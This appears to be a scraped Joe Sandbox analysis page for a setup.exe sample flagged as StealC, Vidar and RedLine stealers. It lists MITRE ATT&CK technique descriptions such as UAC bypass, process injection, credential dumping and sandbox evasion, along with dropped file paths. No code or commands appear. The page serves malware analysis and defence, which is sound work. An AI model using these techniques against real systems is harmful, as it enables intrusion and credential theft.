Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1719859269.0326595_setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Change of critical system settings

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEBAFBGIDHCBFHIECFCB

C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe

C:\ProgramData\BAEHIEBGHDAFIEBGIEHJECGCGC

C:\ProgramData\DAEBFHJKJEBFCBFHDAEGHCBFBG

Windows Analysis Report
1719859269.0326595_setup.exe

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre